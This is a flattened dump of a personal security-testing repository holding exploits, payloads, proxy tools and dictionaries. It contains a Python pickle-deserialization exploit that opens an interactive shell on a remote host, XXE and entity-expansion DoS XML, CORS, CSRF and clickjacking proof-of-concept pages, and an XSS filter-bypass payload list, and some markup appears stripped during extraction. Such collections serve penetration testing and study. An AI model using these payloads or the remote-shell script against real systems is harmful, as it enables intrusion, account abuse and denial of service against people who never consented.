├── exploits ├── 42Tb.zip ├── symLink.zip ├── bad.xml ├── xxe.xml ├── cors-poc.html ├── pickle_deserialization.py ├── dtdDos.xml └── csrf-post-poc.html ├── README.md ├── payloads ├── clickjack.html ├── clickjack2.html ├── xss_eventhandlers_list.txt ├── xxsfilterbypass.lst.txt ├── badstrings.txt ├── xssVectors ├── make_request_http_list.html └── sqli.txt ├── proxies ├── slowChecker.sh ├── crawler.sh ├── fastChecker.c └── sources.list ├── dictionaries ├── private_ips.list └── ctf_ekoparty_usernames.txt ├── haproxy_vpn_loadbalancer ├── haproxy.config └── top_vpns_finder.py └── others └── userAgentStrings /exploits/42Tb.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/guifre/Security-Testing/HEAD/exploits/42Tb.zip -------------------------------------------------------------------------------- /exploits/symLink.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/guifre/Security-Testing/HEAD/exploits/symLink.zip -------------------------------------------------------------------------------- /exploits/bad.xml: -------------------------------------------------------------------------------- 1 | ]>&xee; 2 | 3 | -------------------------------------------------------------------------------- /exploits/xxe.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | ]>&xxe; 5 | 6 | ]> 7 | 8 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | This is my library of security resources for testing. 2 | 3 | So far, it contains: 4 | 5 | Dictionaries 6 | Proxy lists & utils 7 | Exploits 8 | Payloads 9 | Others 10 | -------------------------------------------------------------------------------- /payloads/clickjack.html: -------------------------------------------------------------------------------- 1 | 2 |
click me
3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /exploits/cors-poc.html: -------------------------------------------------------------------------------- 1 | 2 | 13 | 14 | -------------------------------------------------------------------------------- /payloads/clickjack2.html: -------------------------------------------------------------------------------- 1 | 2 |
click me first
3 |
Captcha challenge:
Write attacker@mail.com:
4 |
Write it again:
5 |
click me finally
6 | 7 | 8 | -------------------------------------------------------------------------------- /exploits/pickle_deserialization.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import cPickle as pickle 3 | import cPickle 4 | import subprocess 5 | import sys 6 | 7 | class Execute(object): 8 | def __reduce__(self): 9 | return(subprocess.call, (('/bin/sh','-i'),0,None,4,4,4)) 10 | 11 | s = socket.socket() 12 | s.connect(('amateria.smashthestack.org', 54321)) 13 | print s.recv(256) 14 | s.send(pickle.dumps(Execute())) 15 | while 1 == 1: 16 | print s.recv(512) 17 | msg = sys.stdin.readline() 18 | s.send(msg + '\r\n') 19 | s.close() 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /proxies/slowChecker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # usage ./checker proxylist 3 | # output to workingproxylist 4 | 5 | function check { 6 | data=(${1//:/ }); 7 | result=`printf "GET http://www.google.com/humans.txt HTTP/1.0\r\n\r\n" | nc -w 20 ${data[0]} ${data[1]} 2>/dev/null`; 8 | if [[ $result == *researchers* ]] ; 9 | then 10 | echo $1 >> workingproxylist4 11 | fi 12 | } 13 | counter=1; 14 | while read line; do 15 | check $line & 16 | counter=$[$counter+1]; 17 | if [ $counter -gt 2000 ]; then 18 | sleep 25; 19 | counter=1; 20 | fi 21 | done < $1 22 | 23 | -------------------------------------------------------------------------------- /exploits/dtdDos.xml: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | ]>&foo9; 12 | -------------------------------------------------------------------------------- /dictionaries/private_ips.list: -------------------------------------------------------------------------------- 1 | [::1} 2 | [::] 3 | 0.0.0.0 4 | 127.127.127.127 5 | 127.0.0.1 6 | 10.0.0.1 7 | 10.0.0.138 8 | 10.0.0.2 9 | 10.0.1.1 10 | 10.1.1.1 11 | 10.1.10.1 12 | 10.10.1.1 13 | 10.90.90.90 14 | 192.168.0.1 15 | 192.168.0.10 16 | 192.168.0.100 17 | 192.168.0.101 18 | 192.168.0.227 19 | 192.168.0.254 20 | 192.168.0.3 21 | 192.168.0.30 22 | 192.168.0.50 23 | 192.168.1.1 24 | 192.168.1.10 25 | 192.168.1.10.1 26 | 192.168.1.100 27 | 192.168.1.200 28 | 192.168.1.210 29 | 192.168.1.254 30 | 192.168.1.99 31 | 192.168.10.1 32 | 192.168.10.10 33 | 192.168.10.100 34 | 192.168.10.50 35 | 192.168.100.1 36 | 192.168.100.100 37 | 192.168.102.1 38 | 192.168.11.1 39 | 192.168.123.254 40 | 192.168.15.1 41 | 192.168.16.1 42 | 192.168.168.168 43 | 192.168.2.1 44 | 192.168.2.254 45 | 192.168.20.1 46 | 192.168.223.100 47 | 192.168.251.1 48 | 192.168.254.254 49 | 192.168.3.1 50 | 192.168.30.1 51 | 192.168.4.1 52 | 192.168.50.1 53 | 192.168.55.1 54 | 192.168.62.1 55 | 192.168.8.1 56 | 200.200.200.5 57 | -------------------------------------------------------------------------------- /proxies/crawler.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | browser='wget -qO- --user-agent="Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"'; 4 | results="dirtyProxies.list"; 5 | debugFile="/tmp/crawlerdebug"; 6 | depth=3; 7 | feedList="sources.list"; 8 | 9 | function crawl { 10 | res=$($browser $1); 11 | urls=`echo $res | grep -o '> $debugFile; 14 | for proxyItem in $proxies; do 15 | echo "$proxyItem" >> ${results}; 16 | #echo "Found proxy[$proxyItem]"; 17 | printf "."; 18 | done 19 | for target in $urls; do 20 | if [ $2 -lt ${depth} ]; then 21 | counter=$[$2+1]; 22 | case "$target" in 23 | http* ) newTarget=$target ;; 24 | .\/* ) newTarget=$3"/"$target ;; 25 | www* ) newTarget="http://$target" ;; 26 | \/* ) newTarget="$3$target" ;; 27 | * ) newTarget="$3/$target" ;; 28 | esac 29 | #echo "Target [$target] host [$3] => New target [$newTarget]"; 30 | crawl $newTarget $counter $3 & 31 | sleep $(($depth * 10 * $depth)); 32 | fi 33 | done 34 | } 35 | 36 | while read line; do 37 | host=`echo $3 | awk -F/ '{print $3}'`; 38 | crawl $line"/" 1 $line $line & 39 | sleep 10; 40 | done < "${feedList}" 41 | -------------------------------------------------------------------------------- /exploits/csrf-post-poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 |
31 | 32 | -------------------------------------------------------------------------------- /payloads/xss_eventhandlers_list.txt: -------------------------------------------------------------------------------- 1 | onabort 2 | onactivate 3 | onafterprint 4 | onafterupdate 5 | onanimationend 6 | onanimationiteration 7 | onanimationstart 8 | onautocomplete 9 | onautocompleteerror 10 | onbeforeactivate 11 | onbeforecopy 12 | onbeforecut 13 | onbeforedeactivate 14 | onbeforeeditfocus 15 | onbeforepaste 16 | onbeforeprint 17 | onbeforeunload 18 | onbeforeupdate 19 | onbegin 20 | onblur 21 | onbounce 22 | oncancel 23 | oncanplay 24 | oncanplaythrough 25 | oncellchange 26 | onchange 27 | onclick 28 | onclose 29 | oncompassneedscalibration 30 | oncontextmenu 31 | oncontrolselect 32 | oncopy 33 | oncuechange 34 | oncut 35 | ondataavailable 36 | ondatasetchanged 37 | ondatasetcomplete 38 | ondblclick 39 | ondeactivate 40 | ondevicelight 41 | ondevicemotion 42 | ondeviceorientation 43 | ondeviceproximity 44 | ondrag 45 | ondragdrop 46 | ondragend 47 | ondragenter 48 | ondragexit 49 | ondragleave 50 | ondragover 51 | ondragstart 52 | ondrop 53 | ondurationchange 54 | onemptied 55 | onend 56 | onended 57 | onerror 58 | onerrorupdate 59 | onexit 60 | onfilterchange 61 | onfinish 62 | onfocus 63 | onfocusin 64 | onfocusout 65 | onformchange 66 | onforminput 67 | ongesturechange 68 | ongestureend 69 | ongesturestart 70 | onhashchange 71 | onhelp 72 | oninput 73 | oninvalid 74 | onkeydown 75 | onkeypress 76 | onkeyup 77 | onlanguagechange 78 | onlayoutcomplete 79 | onload 80 | onloadeddata 81 | onloadedmetadata 82 | onloadstart 83 | onlosecapture 84 | onmediacomplete 85 | onmediaerror 86 | onmessage 87 | onmousedown 88 | onmouseenter 89 | onmouseleave 90 | onmousemove 91 | onmouseout 92 | onmouseover 93 | onmouseup 94 | onmousewheel 95 | onmove 96 | onmoveend 97 | onmovestart 98 | onmozfullscreenchange 99 | onmozfullscreenerror 100 | onmozpointerlockchange 101 | onmozpointerlockerror 102 | onmsgesturechange 103 | onmsgesturedoubletap 104 | onmsgesturehold 105 | onmsgesturerestart 106 | onmsinertiastart 107 | onmspointercancel 108 | onmspointerdown 109 | onmspointerenter 110 | onmspointerhover 111 | onmspointerleave 112 | onmspointermove 113 | onmspointerout 114 | onmspointerover 115 | onmspointerup 116 | onoffline 117 | ononline 118 | onorientationchange 119 | onoutofsync 120 | onpagehide 121 | onpageshow 122 | onpaste 123 | onpause 124 | onplay 125 | onplaying 126 | onpopstate 127 | onprogress 128 | onpropertychange 129 | onratechange 130 | onreadystatechange 131 | onreceived 132 | onrepeat 133 | onreset 134 | onresize 135 | onresizeend 136 | onresizestart 137 | onresume 138 | onreverse 139 | onrowdelete 140 | onrowenter 141 | onrowexit 142 | onrowinserted 143 | onrowsdelete 144 | onrowsinserted 145 | onscroll 146 | onsearch 147 | onseek 148 | onseeked 149 | onseeking 150 | onselect 151 | onselectionchange 152 | onselectstart 153 | onshow 154 | onstalled 155 | onstart 156 | onstop 157 | onstorage 158 | onsubmit 159 | onsuspend 160 | onsynchrestored 161 | ontimeerror 162 | ontimeupdate 163 | ontoggle 164 | ontouchcancel 165 | ontouchend 166 | ontouchmove 167 | ontouchstart 168 | ontrackchange 169 | ontransitionend 170 | onunload 171 | onurlflip 172 | onuserproximity 173 | onvolumechange 174 | onwaiting 175 | onwebkitanimationend 176 | onwebkitanimationiteration 177 | onwebkitanimationstart 178 | onwebkitmouseforcechanged 179 | onwebkitmouseforcedown 180 | onwebkitmouseforceup 181 | onwebkitmouseforcewillbegin 182 | onwebkittransitionend 183 | onwebkitwillrevealbottom 184 | onwheel 185 | onzoom 186 | -------------------------------------------------------------------------------- /proxies/fastChecker.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | int create_tcp_socket(); 10 | char *build_get_query(char *host); 11 | void *senda(void *hos); 12 | 13 | /* proxy validator 14 | usage $ gcc fastChecker.c -o fastChecker -lpthread; ./fastChecker proxy.list 15 | */ 16 | int main(int argc, char **argv) { 17 | char * target; 18 | pthread_t thread[1000]; 19 | int iret1, iret2i,i; 20 | 21 | FILE * fp; 22 | char * line = NULL; 23 | size_t len = 0; 24 | ssize_t read; 25 | fp = fopen(argv[1], "r"); 26 | if (fp == NULL) 27 | printf("could read proxies"); 28 | 29 | while ((read = getline(&line, &len, fp)) != -1) { 30 | target = (char *) malloc (1000); 31 | strcpy(target, line); 32 | pthread_create( &thread[i], NULL, *senda, (void *) target); 33 | i++; 34 | } 35 | 36 | int j; 37 | for (j=0;jsin_family = AF_INET; 70 | tmpres = inet_pton(AF_INET, host, (void *)(&(remote->sin_addr.s_addr))); 71 | if( tmpres < 0) 72 | { 73 | //perror("Can't set remote->sin_addr.s_addr"); 74 | } 75 | else if (tmpres == -1) 76 | { 77 | //fprintf(stderr, "%s is not a valid IP address\n", host); 78 | } 79 | remote->sin_port = htons(atoi(port)); 80 | if (connect(sock, (struct sockaddr *)remote, sizeof(struct sockaddr)) < 0) 81 | { 82 | //perror("Could not connect"); 83 | return; 84 | } 85 | get = build_get_query(host); 86 | 87 | //Send the query to the server 88 | int sent = 0; 89 | while(sent < strlen(get)) 90 | { 91 | tmpres = send(sock, get+sent, strlen(get)-sent, 0); 92 | if(tmpres == -1) 93 | { 94 | perror("Can't send query"); 95 | } 96 | sent += tmpres; 97 | } 98 | //now it is time to receive the page 99 | memset(buf, 0, sizeof(buf)); 100 | int htmlstart = 0; 101 | char *htmlcontent; 102 | while ((tmpres = recv(sock, buf, BUFSIZ, 0)) > 0) 103 | { 104 | if (htmlstart == 0) 105 | { 106 | htmlcontent = strstr(buf, "\r\n\r\n"); 107 | if (htmlcontent != NULL) 108 | { 109 | htmlstart = 1; 110 | htmlcontent += 4; 111 | } 112 | } 113 | else 114 | { 115 | htmlcontent = buf; 116 | } 117 | if (htmlstart) 118 | { 119 | // fprintf(stdout, htmlcontent); 120 | if (strstr(htmlcontent, "Google is") != NULL) 121 | { 122 | printf("%s:%s is valid\n", host, port); 123 | } 124 | } 125 | memset(buf, 0, tmpres); 126 | } 127 | if (tmpres < 0) 128 | { 129 | perror("Error receiving data"); 130 | } 131 | if (strstr(htmlcontent, "Google is built by a large team of engineers") != NULL) 132 | { 133 | printf("%s is valid\n", host); 134 | } 135 | free(get); 136 | free(remote); 137 | close(sock); 138 | } 139 | 140 | 141 | int create_tcp_socket() 142 | { 143 | int sock; 144 | if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) 145 | { 146 | perror("Can't create TCP socket"); 147 | } 148 | 149 | return sock; 150 | } 151 | 152 | 153 | char *build_get_query(char *host) 154 | { 155 | char *query; 156 | char *req; 157 | req = (char *) malloc ( 1024 + 1 ); 158 | strcpy(req, "http://www.google.com/humans.txt"); 159 | char *tpl = "GET http://www.google.com/humans.txt HTTP/1.1\r\nAccept: */*\r\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36\r\n\r\n"; 160 | query = (char *)malloc(strlen(host)+strlen(req)+strlen(tpl)-5); 161 | sprintf(query, tpl, host); 162 | 163 | return query; 164 | } 165 | 166 | -------------------------------------------------------------------------------- /payloads/xxsfilterbypass.lst.txt: -------------------------------------------------------------------------------- 1 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> 2 | '';!--"=&{()} 3 | 0\"autofocus/onfocus=alert(1)-->xxs link 15 | xxs link 16 | "> 17 | 18 | 19 | 20 | 21 | 22 | 24 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | < 36 | 42 | 43 | 44 | 45 | 46 | 47 |